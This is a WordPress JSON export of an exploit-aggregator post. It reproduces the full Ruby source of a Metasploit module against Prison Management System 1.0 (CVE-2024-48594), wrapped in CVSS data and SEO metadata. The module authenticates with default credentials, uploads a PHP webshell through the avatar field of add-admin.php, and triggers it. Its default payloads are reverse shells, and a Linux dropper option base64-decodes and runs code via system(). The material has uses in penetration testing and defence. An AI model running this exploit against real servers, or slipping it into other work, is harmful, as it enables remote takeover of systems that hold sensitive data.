{"id":34751,"date":"2026-01-08T13:33:56","date_gmt":"2026-01-08T13:33:56","guid":{"rendered":"http:\/\/localhost\/?p=34751"},"modified":"2026-01-08T13:33:56","modified_gmt":"2026-01-08T13:33:56","slug":"prison-management-system-10-authenticated-rce-via-unrestricted-file-upload","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=34751","title":{"rendered":"Prison Management System 1.0 Authenticated RCE via Unrestricted File Upload_MSF:EXPLOIT-LINUX-HTTP-PRISON_MANAGEMENT_RCE-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-08T19:04:55&#8243;,&#8221;description&#8221;:&#8221;This module exploits an unrestricted file upload vulnerability in Prison Management System 1.0. An authenticated user can upload a PHP file with arbitrary content by abusing the avatar upload functionality in the add-admin.php endpoint. The application&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-01-08T18:56:39&#8243;,&#8221;modified&#8221;:&#8221;2026-01-08T18:56:39&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Prison Management System 1.0 Authenticated RCE via Unrestricted File Upload&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-LINUX-HTTP-PRISON_MANAGEMENT_RCE-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-48594&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n  Rank = ExcellentRanking\\n\\n  include Msf::Exploit::Remote::HttpClient\\n  include Msf::Exploit::FileDropper\\n  prepend Msf::Exploit::Remote::AutoCheck\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;Prison Management System 1.0 Authenticated RCE via Unrestricted File Upload&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          This module exploits an unrestricted file upload vulnerability in Prison Management System 1.0.\\n          An authenticated user can upload a PHP file with arbitrary content by abusing the avatar upload\\n          functionality in the add-admin.php endpoint. The application fails to properly validate the\\n          uploaded file type, allowing an attacker to upload a PHP webshell.\\n        },\\n        &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n        &#8216;Author&#8217; =\\u003e [\\n          &#8216;Alexandru Ionut Raducu&#8217;,\\n        ],\\n        &#8216;References&#8217; =\\u003e [\\n          [&#8216;CVE&#8217;, &#8216;2024-48594&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/www.sourcecodester.com\/sql\/17287\/prison-management-system.html&#8217;]\\n        ],\\n        &#8216;Platform&#8217; =\\u003e [&#8216;php&#8217;, &#8216;unix&#8217;, &#8216;linux&#8217;],\\n        &#8216;Arch&#8217; =\\u003e [ARCH_PHP, ARCH_CMD],\\n        &#8216;Targets&#8217; =\\u003e [\\n          [\\n            &#8216;PHP&#8217;,\\n            {\\n              &#8216;Platform&#8217; =\\u003e &#8216;php&#8217;,\\n              &#8216;Arch&#8217; =\\u003e ARCH_PHP,\\n              &#8216;DefaultOptions&#8217; =\\u003e { &#8216;PAYLOAD&#8217; =\\u003e &#8216;php\/meterpreter\/reverse_tcp&#8217; },\\n              &#8216;Type&#8217; =\\u003e :php\\n            }\\n          ],\\n          [\\n            &#8216;Unix Command&#8217;,\\n            {\\n              &#8216;Platform&#8217; =\\u003e &#8216;unix&#8217;,\\n              &#8216;Arch&#8217; =\\u003e ARCH_CMD,\\n              &#8216;DefaultOptions&#8217; =\\u003e { &#8216;PAYLOAD&#8217; =\\u003e &#8216;cmd\/unix\/reverse_bash&#8217; },\\n              &#8216;Type&#8217; =\\u003e :unix_cmd\\n            }\\n          ],\\n          [\\n            &#8216;Linux Dropper&#8217;,\\n            {\\n              &#8216;Platform&#8217; =\\u003e &#8216;linux&#8217;,\\n              &#8216;Arch&#8217; =\\u003e [ARCH_X64, ARCH_X86],\\n              &#8216;DefaultOptions&#8217; =\\u003e { &#8216;PAYLOAD&#8217; =\\u003e &#8216;linux\/x64\/meterpreter\/reverse_tcp&#8217; },\\n              &#8216;Type&#8217; =\\u003e :linux_dropper\\n            }\\n          ]\\n        ],\\n        &#8216;Privileged&#8217; =\\u003e false,\\n        &#8216;DisclosureDate&#8217; =\\u003e &#8216;2024-10-28&#8217;,\\n        &#8216;DefaultTarget&#8217; =\\u003e 0,\\n        &#8216;Notes&#8217; =\\u003e {\\n          &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n          &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION],\\n          &#8216;SideEffects&#8217; =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\\n        }\\n      )\\n    )\\n\\n    register_options([\\n      OptString.new(&#8216;TARGETURI&#8217;, [true, &#8216;The base path to Prison Management System&#8217;, &#8216;\/&#8217;]),\\n      OptString.new(&#8216;USERNAME&#8217;, [true, &#8216;Username for authentication&#8217;, &#8216;admin&#8217;]),\\n      OptString.new(&#8216;PASSWORD&#8217;, [true, &#8216;Password for authentication&#8217;, &#8216;admin123&#8217;])\\n    ])\\n  end\\n\\n  def check\\n    res = send_request_cgi(\\n      &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;Admin&#8217;, &#8216;login.php&#8217;)\\n    )\\n\\n    return CheckCode::Unknown(&#8216;Connection failed&#8217;) unless res\\n    return CheckCode::Detected(\\&#8221;Unexpected response code: #{res.code}\\&#8221;) unless res.code == 200\\n\\n    if res.body.include?(&#8216;Prison Management System&#8217;) || res.body.include?(&#8216;txtusername&#8217;)\\n      return CheckCode::Detected(&#8216;Prison Management System login page detected&#8217;)\\n    end\\n\\n    CheckCode::Safe(&#8216;Target does not appear to be Prison Management System&#8217;)\\n  end\\n\\n  def login\\n    print_status(\\&#8221;Attempting to authenticate as #{datastore[&#8216;USERNAME&#8217;]}&#8230;\\&#8221;)\\n\\n    # First GET request to obtain session cookie\\n    res = send_request_cgi(\\n      &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;Admin&#8217;, &#8216;login.php&#8217;),\\n      &#8216;keep_cookies&#8217; =\\u003e true\\n    )\\n\\n    fail_with(Failure::Unreachable, &#8216;Connection failed while fetching login page&#8217;) unless res\\n    fail_with(Failure::UnexpectedReply, \\&#8221;Unexpected response code: #{res.code}\\&#8221;) unless res.code == 200\\n\\n    vprint_status(\\&#8221;Retrieved session cookie: #{res.get_cookies}\\&#8221;)\\n\\n    # POST login credentials\\n    res = send_request_cgi(\\n      &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;Admin&#8217;, &#8216;login.php&#8217;),\\n      &#8216;keep_cookies&#8217; =\\u003e true,\\n      &#8216;vars_post&#8217; =\\u003e {\\n        &#8216;txtusername&#8217; =\\u003e datastore[&#8216;USERNAME&#8217;],\\n        &#8216;txtpassword&#8217; =\\u003e datastore[&#8216;PASSWORD&#8217;],\\n        &#8216;btnlogin&#8217; =\\u003e &#8221;\\n      }\\n    )\\n\\n    fail_with(Failure::Unreachable, &#8216;Connection failed during login&#8217;) unless res\\n\\n    fail_with(Failure::NoAccess, &#8216;Login failed &#8211; invalid credentials&#8217;) unless res.code == 302\\n\\n    print_good(&#8216;Successfully authenticated!&#8217;)\\n  end\\n\\n  def upload_webshell\\n    @webshell_name = Rex::Text.rand_text_alpha(8) + &#8216;.php&#8217;\\n\\n    case target[&#8216;Type&#8217;]\\n    when :php\\n      php_payload = payload.encoded\\n    when :unix_cmd\\n      php_payload = \\&#8221;\\u003c?php system(base64_decode(&#8216;#{Rex::Text.encode_base64(payload.encoded)}&#8217;)); ?\\u003e\\&#8221;\\n    when :linux_dropper\\n      php_payload = \\&#8221;\\u003c?php system(base64_decode(&#8216;#{Rex::Text.encode_base64(payload.encoded)}&#8217;)); ?\\u003e\\&#8221;\\n    end\\n\\n    # Generate random form data for the new admin user\\n    random_username = Rex::Text.rand_text_alpha(8)\\n    random_fullname = Rex::Text.rand_text_alpha(8)\\n    random_password = Rex::Text.rand_text_alpha(8)\\n    random_phone = Rex::Text.rand_text_numeric(10)\\n\\n    print_status(\\&#8221;Uploading webshell as #{@webshell_name}&#8230;\\&#8221;)\\n\\n    # Build multipart form data\\n    form_data = Rex::MIME::Message.new\\n    form_data.add_part(random_username, nil, nil, &#8216;form-data; name=\\&#8221;txtusername\\&#8221;&#8216;)\\n    form_data.add_part(random_fullname, nil, nil, &#8216;form-data; name=\\&#8221;txtfullname\\&#8221;&#8216;)\\n    form_data.add_part(random_password, nil, nil, &#8216;form-data; name=\\&#8221;txtpassword\\&#8221;&#8216;)\\n    form_data.add_part(random_phone, nil, nil, &#8216;form-data; name=\\&#8221;txtphone\\&#8221;&#8216;)\\n    form_data.add_part(&#8221;, nil, nil, &#8216;form-data; name=\\&#8221;btncreate\\&#8221;&#8216;)\\n    form_data.add_part(php_payload, &#8216;image\/jpeg&#8217;, nil, \\&#8221;form-data; name=\\\\\\&#8221;avatar\\\\\\&#8221;; filename=\\\\\\&#8221;#{@webshell_name}\\\\\\&#8221;\\&#8221;)\\n\\n    res = send_request_cgi(\\n      &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;Admin&#8217;, &#8216;add-admin.php&#8217;),\\n      &#8216;ctype&#8217; =\\u003e \\&#8221;multipart\/form-data; boundary=#{form_data.bound}\\&#8221;,\\n      &#8216;data&#8217; =\\u003e form_data.to_s,\\n      &#8216;keep_cookies&#8217; =\\u003e true\\n    )\\n\\n    fail_with(Failure::Unreachable, &#8216;Connection failed during upload&#8217;) unless res\\n    fail_with(Failure::UnexpectedReply, &#8216;File upload failed&#8217;) unless res.code == 200 \\u0026\\u0026 res.body.include?(&#8216;User Added Successfully&#8217;)\\n\\n    @webshell_path = normalize_uri(target_uri.path, &#8216;uploadImage&#8217;, &#8216;Profile&#8217;, @webshell_name)\\n    register_file_for_cleanup(@webshell_name)\\n\\n    print_good(\\&#8221;Webshell uploaded to #{@webshell_path}\\&#8221;)\\n  end\\n\\n  def execute_webshell\\n    print_status(&#8216;Triggering payload execution&#8230;&#8217;)\\n\\n    send_request_cgi({\\n      &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n      &#8216;uri&#8217; =\\u003e @webshell_path,\\n      &#8216;keep_cookies&#8217; =\\u003e true\\n    }, 5)\\n  end\\n\\n  def exploit\\n    login\\n    upload_webshell\\n    execute_webshell\\n  end\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/http\/prison_management_rce.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:8.8,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/http\/prison_management_rce\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-08T19:04:55&#8243;,&#8221;description&#8221;:&#8221;This module exploits an unrestricted file upload vulnerability in Prison Management System 1.0. An authenticated user can upload a PHP file with arbitrary content by&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,169,13,7,11,5],"class_list":["post-34751","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Prison Management System 1.0 Authenticated RCE via Unrestricted File Upload_MSF:EXPLOIT-LINUX-HTTP-PRISON_MANAGEMENT_RCE- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=34751\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Prison Management System 1.0 Authenticated RCE via Unrestricted File Upload_MSF:EXPLOIT-LINUX-HTTP-PRISON_MANAGEMENT_RCE- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-01-08T19:04:55&#8243;,&#8221;description&#8221;:&#8221;This module exploits an unrestricted file upload vulnerability in Prison Management System 1.0. An authenticated user can upload a PHP file with arbitrary content by...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=34751\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-08T13:33:56+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34751#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34751\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Prison Management System 1.0 Authenticated RCE via Unrestricted File Upload_MSF:EXPLOIT-LINUX-HTTP-PRISON_MANAGEMENT_RCE-\",\"datePublished\":\"2026-01-08T13:33:56+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34751\"},\"wordCount\":1199,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.8\",\"exploit\",\"HIGH\",\"metasploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=34751#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34751\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34751\",\"name\":\"Prison Management System 1.0 Authenticated RCE via Unrestricted File Upload_MSF:EXPLOIT-LINUX-HTTP-PRISON_MANAGEMENT_RCE- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-08T13:33:56+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34751#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=34751\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34751#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Prison Management System 1.0 Authenticated RCE via Unrestricted File Upload_MSF:EXPLOIT-LINUX-HTTP-PRISON_MANAGEMENT_RCE-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Prison Management System 1.0 Authenticated RCE via Unrestricted File Upload_MSF:EXPLOIT-LINUX-HTTP-PRISON_MANAGEMENT_RCE- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=34751","og_locale":"en_US","og_type":"article","og_title":"Prison Management System 1.0 Authenticated RCE via Unrestricted File Upload_MSF:EXPLOIT-LINUX-HTTP-PRISON_MANAGEMENT_RCE- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-01-08T19:04:55&#8243;,&#8221;description&#8221;:&#8221;This module exploits an unrestricted file upload vulnerability in Prison Management System 1.0. An authenticated user can upload a PHP file with arbitrary content by...","og_url":"https:\/\/zero.redgem.net\/?p=34751","og_site_name":"zero redgem","article_published_time":"2026-01-08T13:33:56+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=34751#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=34751"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Prison Management System 1.0 Authenticated RCE via Unrestricted File Upload_MSF:EXPLOIT-LINUX-HTTP-PRISON_MANAGEMENT_RCE-","datePublished":"2026-01-08T13:33:56+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=34751"},"wordCount":1199,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.8","exploit","HIGH","metasploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=34751#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=34751","url":"https:\/\/zero.redgem.net\/?p=34751","name":"Prison Management System 1.0 Authenticated RCE via Unrestricted File Upload_MSF:EXPLOIT-LINUX-HTTP-PRISON_MANAGEMENT_RCE- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-08T13:33:56+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=34751#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=34751"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=34751#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Prison Management System 1.0 Authenticated RCE via Unrestricted File Upload_MSF:EXPLOIT-LINUX-HTTP-PRISON_MANAGEMENT_RCE-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/34751","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=34751"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/34751\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=34751"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=34751"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=34751"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}